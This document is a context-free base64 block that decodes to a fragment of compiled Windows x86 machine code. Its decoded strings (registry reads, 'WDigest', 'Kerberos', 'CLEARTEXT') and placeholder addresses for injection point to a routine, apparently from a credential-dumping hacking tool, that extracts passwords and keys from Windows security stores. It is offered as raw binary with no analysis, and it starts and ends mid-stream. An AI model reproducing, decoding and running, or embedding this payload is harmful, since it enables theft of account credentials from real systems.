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T////oQogAAGo8jYUI////VlCJtQT////oLYgAAIPEGIP/QHYDakBfV/91CI2FRP///1DoGIgAAFf/dQiNhQT///9Q6AiIAACDxBgzwIG0BUT///82NjY2gbQFBP///1xcXFyDwASD+EBy4o1FhFDoBHsAAGpAjYVE////UI1FhFDo7HoAAGoQ/3UMjUWEUOjeegAAjUWEUOjPegAAjXXcjX3spaWljUWEUKXoyHoAAGpAjYUE////UI1FhFDosHoAAGoQjUXsUI1FhFDooXoAAI1FhFDoknoAAIt9EI113KWlpaVfXsnDVYvsgexsAQAAjUWsiUXAiUW4uBAMAhBTM9uJhUj///+JhVj///+44AsCEFa+KAwCEImFaP///4mFeP///42F2P7//1eJXdyJXaiJXeCJXeiJXdSJXdiJXeyJXfSJXayJXbCJXbyJXbSJXfiJtdj+///Hhdz+//94JQIQx4Xg/v//QUFBQYmd5P7//4m16P7//8eF7P7//4QlAhDHhfD+//9CQkJCiZ30/v//ibX4/v//x4X8/v//lCUCEMeFAP///0NDQ0OJnQT///+JtQj////HhQz///+0JQIQx4UQ////RERERImdFP///4m1GP///8eFHP///8QlAhDHhSD///9FRUVFiZ0k////ibUo////x4Us////1CUCEMeFMP///0ZGRkaJnTT///+JtTj////HhTz////wJQIQx4VA////R0dHR4mdRP///8eFTP///xAmAhDHhVD///9ISEhIiZ1U////x4Vc////NCYCEMeFYP///0lJSUmJnWT////HhWz///9YJgIQx4Vw////SkpKSomddP///8eFfP///2gmAhDHRYBLS0tLiV2Ex0WI/AsCEMdFjHQmAhDHRZBMTExMiV2Ux0WYDAAAAIlFnDkdhNsCEA+FeAEAAFNTaHwmAhD/dQz/dQjotZX//4PEFIXAD4TpAAAA/zW43AIQuRjSAhBqBOhudf//i/hZWTv7D4SuAwAAi0cIiUW8i0cQiUW0jUX0aDgEAABQ6JwDAABZWYXAD4RvAwAAVv919I2FrP7//+ire///WVmFwHR6/3UMi4Ws/v///3UIiYXI/v//i4Ww/v//iYXM/v//i4W0/v//iYXQ/v//aMStABD/dxSNRbT/dwzHBYTbAhABAAAAUP93BI1FvFCNhcj+///oinP//4PEIIXAdRP/FfCRARBQaIgmAhDoanL//1lZiR2E2wIQ6eACAAD/FfCRARBQaPAmAhDoTHL//1lZ6cgCAAA5HYTbAhB1alNTaKQnAhD/dQz/dQjop5T//4PEFIXAdFGNRfRoOgQAAFDovAIAAFlZhcB0PY1FmFC47rcAELmYvAAQK8hRUItF9I2NwP7//+h2jv//g8QMhcB0C42FwP7//4lF+OsLaLgnAhDo1HH//1lqBlkzwI29lP7///OrjUXEUGoBjYWU/v//UFPoz3YAAIXAD4wiAgAAjUXkUGoF/3XE6LN2AACFwA+MBAIAAFNoPwAPAI1FzFBT6CV3AAA7w4lF8A+M1AEAAI1F/FCLReT/cAhoBQcAAP91zOj9dgAAO8OJRfAPjJsBAAD/deRoXCgCEOhLcf//i0Xk/3AI6HmT//+DxAxooK0BEOgzcf//WVONReBQaHTCARD/dQz/dQjomZP//4PEFFOFwHRsU/914P8VzJMBEIPEDIlFyDvDdE6NRexQjUXUUI1FyFBqAf91/Oh/dgAAO8OJRfB8Kf91+ItFyP911P91/OjtAQAAg8QM/3XU6ER2AAD/dezoPHYAAOn0AAAAUGiAKAIQ63P/deBo8CgCEOtpjUXoUGhYKQIQ/3UM/3UI6BGT//+DxBSFwHRX/3XojUWgUOiCdgAAjUXsUI1F2FCNRaBQagH/dfzo+nUAADvDiUXwfB//dfiNRaBQi0XY/3X8iwDoawEAAIPEDP912Ol5////UGhoKQIQ6Dtw//9ZWetwjUXQUGpkjUXcUFONRahQ/3X86KJ1AAA7w4lF6H0WPQUBAAB0D1Bo2CkCEOgHcP//WVnrMzP/OV3QdiQz9otF3P91+APGjUgEiwBR/3X86P4AAACDxAxHg8YMO33Qct7/ddzoTHUAAIF96AUBAAB0kP91/Og1dQAA6w1QaFAqAhDosm///1lZ/3XM6B51AADrDVBosCoCEOibb///WVn/deTo13QAAP91xOirdAAAi034O8t0BejHaf//i3X0O/N0FItGBDkYdAj/MP8V/JEBEOjdZf//i0XwX15bycNVi+yD7CRWV41F3FBoCCsCEDP/6OuM//9ZWYXAdD3/dfhX/3UM/xX0kQEQi/CF9nQci30IVmoB6Adl//+L+FlZhf91Klb/FfyRARDrIf8V8JEBEFBoGCsCEOsM/xXwkQEQUGiQKwIQ6O5u//9ZWYvHX17Jw1WL7IPsIFNWV/91DIvwVlZoMCwCEOjMbv//g8QQg30QAA+FrQAAAI1F+FBWaBsDAAD/dQjoNXQAAIXAD4yEAAAAjUX8UGoS/3X46Ad0AACFwHxYaGwsAhDoiW7//4tF/IB4IQBZdA+DwBBQahAzwFnobo///1lofCwCEOhmbv//i0X8gHggAFl0DFBqEDPAWehOj///WWigrQEQ6EZu//9Z/3X86LlzAADrDVBokCwCEOgwbv//WVn/dfjonHMAAOmIAAAAUGgQLQIQ6BZu//9ZWet5agxqQP8VDJIBEIv4iX30hf90ZoMnAI1F4FCLRRBXiXcE6FqH//9ZWYXAdEaLRfCL2IXAdD2DZRAAgzgAdi2NeBCLB4XAdBSLT/yFyXQNjTQYi0f4UegkAAAAWf9FEItFEIPHEDsDctmLffRT/xUQkgEQV/8VEJIBEF9eW8nDU1eL+IP/BXMJiwS9GNMCEOsFuHQtAhBQaIQtAhDocm3//4vHM9srw1lZD4Q2AQAASA+EGAEAAEgPhNIAAABID4SHAAAASHQZi0wkDDPAVkDoPI7//8cEJKCtARDpRQEAAP92FItGEAPGUA+3RgzR6FBoYC4CEOgZbf//D7dGBGgoLgIQUI1+GFbolAEAAA+3TgZozC4CEFFWi/joggEAAA+3TghoQC4CEFFWi/jocAEAAA+3Tgpo9C4CEFFWi/joXgEAAIPEQOngAAAAi0YMA8ZQD7dGCNHoUGj0LQIQ6LFs//8Pt0YEaCguAhBQjV4QVui5AAAAD7dOBmhALgIQUVaL2OinAAAAg8Qk6ZwAAAAz/zheAw+GkQAAAI1eEEdXaNwtAhDoamz//1NqEDPAWehcjf//aKCtARDoVWz//w+2RgODxBCDwxA7+HLR612LRCQMVtHoUGjILQIQ6DNs//+DxAzrRmiULQIQ6CRs//9ZOF4hdA+NRhBQahAzwFnoDY3//1lorC0CEOgFbP//WTheIHQMVmoQM8BZ6PGM//9ZaKCtARDo6Wv//1lfW8NVi+xmg30MAHReg30QAHQP/3UQaBgvAhDoyGv//1lZM8BmO0UMc0FWVw+3fQyNcwyLRvzoTrf//1BoKC8CEOiia///i0YEA0UIiw5QM8Doj4z//2igrQEQ6Ihr//+DxBCDxhRPdcpfXg+3RQxrwBQDw13DVYvsZoN9DAB0YYN9EAB0D/91EGgYLwIQ6FVr//9ZWTPAZjtFDHNEUw+3XQxWjXcQ/3cIi0b86Ni2//9QaEAvAhDoLGv//4tGBANFCIsOUDPA6BmM//9ooK0BEOgSa///g8QUg8YYS3XHXlsPt0UMa8AYA8ddw1WL7IHsVAEAAFZXg6Ws/v//AMeFWP///0MATADHhVz///9FAEEAx4Vg////UgBUAMeFZP///0UAWADHhWj///9UAAAAM8CNvWz///+rq6urq8dFgFcARADHRYRpAGcAx0WIZQBzAMdFjHQAAABqBlkzwI19kPOrx0WoSwBlAMdFrHIAYgDHRbBlAHIAx0W0bwBzAINluAAzwI19vKurq6urx0XQSwBlAMdF1HIAYgDHRdhlAHIAx0XcbwBzAMdF4C0ATgDHReRlAHcAx0XoZQByAMdF7C0ASwDHRfBlAHkAx0X0cwAAAGoSWGaJhbT+//9qElhmiYW2/v//jYVY////iYW4/v//ag5YZomFvP7//2oOWGaJhb7+//+NRYCJhcD+//9qEFhmiYXE/v//ahBYZomFxv7//41FqImFyP7//2omWGaJhcz+//9qJlhmiYXO/v//jUXQiYXQ/v//agFoAAAAEI2F2P7//1BqALhBQUFB/9CFwA+MJQMAAI2FsP7//1BqBbhISEhI/9CFwA+M/wIAAI2F3P7//1CLhbD+////cAhoAAAAEP+12P7//7hERERE/9CFwA+MxgIAAI2F1P7//1CLRQj/cBhoAAAAEP+13P7//7hFRUVF/9CFwA+MkQIAAINl/ADrB4tF/ECJRfyDffwFD4MPAQAAi0X8a8AYg6QF9P7//wCLRfxrwBiDpAXk/v//AItF/GvAGItN/ImMBeD+//+LRfxrwBjHhAXw/v//gAAAAIN9/AB0Q4tF/GvAGI2EBeT+//9Qi0X8a8AYjYQF9P7//1CLRfyNhMWs/v//UP+11P7//7hDQ0ND/9CLTfxryRiJhA3w/v//6zuLRfxrwBjHhAXk/v//JAAAAItF/GvAGI2EBfT+//9QahL/tdT+//+4RkZGRv/Qi038a8kYiYQN8P7//4tF/GvAGIO8BfD+//8AfDmLRfxrwBiDvAX0/v//AHQpi0X8a8AYg7wF5P7//wB0GYtF/GvAGIuNrP7//wOMBeT+//+Jjaz+///p4P7//4uFrP7//4PAWItNCIlBDGoEaAAwAACLRQj/cAxqALhKSkpK/9CLTQiJQRCLRQiDeBAAD4QlAQAAg6Ws/v//AItFCItAEMcABQAAAINl/ADrB4tF/ECJRfyDffwFD4P7AAAAi0X8a8AYg7wF8P7//wAPjOIAAACLRfxrwBiDvAX0/v//AA+EnAAAAItF/GvAGIO8BeT+//8AD4SIAAAAi4Ws/v//g8BYi038a8kYiYQN6P7//4tF/GvAGI20BeD+//+LRQiLQBCLTfzB4QSNfAgIpaWlpYtF/GvAGP+0BeT+//+LRfxrwBj/tAX0/v//i0X8a8AYi00Ii0kQA4wF6P7//1G4TExMTP/Qg8QMi0X8a8AYi42s/v//A4wF5P7//4mNrP7//4N9/AB0FotF/GvAGP+0BfT+//+4S0tLS//Q6xZqEotF/GvAGP+0BfT+//+4R0dHR//Q6fT+//+NhdT+//9QuEJCQkL/0I2F3P7//1C4QkJCQv/Q/7Ww/v//agW4SUlJSf/QjYXY/v//ULhCQkJC/9AzwF9eycIEAFWL7LhyYXNsXcNRV2g0MwIQ/xV0kQEQM/+jiNsCEDvHD4TMAAAAVos1cJEBEGhEMwIQUP/WaFQzAhD/NYjbAhCjkNsCEP/WaGQzAhD/NYjbAhCjlNsCEP/WaHgzAhD/NYjbAhCjmNsCEP/WaIwzAhD/NYjbAhCjnNsCEP/WaJwzAhD/NYjbAhCjoNsCEP/Wiw2Q2wIQo6TbAhBeO890QTk9lNsCEHQ5OT2Y2wIQdDE5PZzbAhB0KTk9oNsCEHQhO8d0HYM9tNwCEAZojNsCEI1EJAhQG8BAV0BQ/9GFwHQS/zWI2wIQ/xV4kQEQiT2I2wIQM8BfWcODPYjbAhAAdCWhjNsCEIXAdBBqAFD/FZTbAhCDJYzbAhAA/zWI2wIQ/xV4kQEQM8DDU2oWahZoxDMCEGjcMwIQu6wzAhDoiAMAAIPEEDPAW8NTaipqKmgYNAIQaEQ0AhC77DMCEOhoAwAAg8QQM8Bbw1NqHmoeaHw0AhBonDQCELtcNAIQ6EgDAACDxBAzwFvDagBotDQCEGoBuUDQAhDoKmf//4PEDDPAw4tEJASLCDlMJAhyHotQCAPROVQkCHMT/3AQaMw0AhDojWT//1lZM8DrAzPAQMIIAFWL7IHsmAAAAFNWV2oEWY1F+4mFcP///zPAQDP2iYV0////iYV4////iUWAiUWIiUWgjVX0agKJVYxajUXsiUWoiVWQiVWUM9u6TAEAAGY5VQyNRdCJReiNRfCJRcgPlcONRdCJRcyLRQiJjXz///+JTZhqA4lNtIsIi0AEWoldnIl18MZF++nGRfT/xkX1JcZF7FDGRe1IxkXuuIm1bP///4l1hIl1pIlVrIlVsIl1uIl1vIl10Il11Il15IlN3IlF4Il1DI2dfP///+sDagNaOVUMD4ORAAAAi0UQO0PwcnqLQ/yLOwP4V2pAiX3Y/xUMkgEQiUXkO8Z0YFf/dQiNReRQ6DBa//+DxAyFwHRDi1Xki0v4i3P0i/ozwPOmdTCDewQAi0P8iwQQdAYDRdwDRdiDewgAiUXwdBWJRdxqBI1F3FCNRchQ6OtZ//+DxAwz9v915P8VEJIBEP9FDIPDH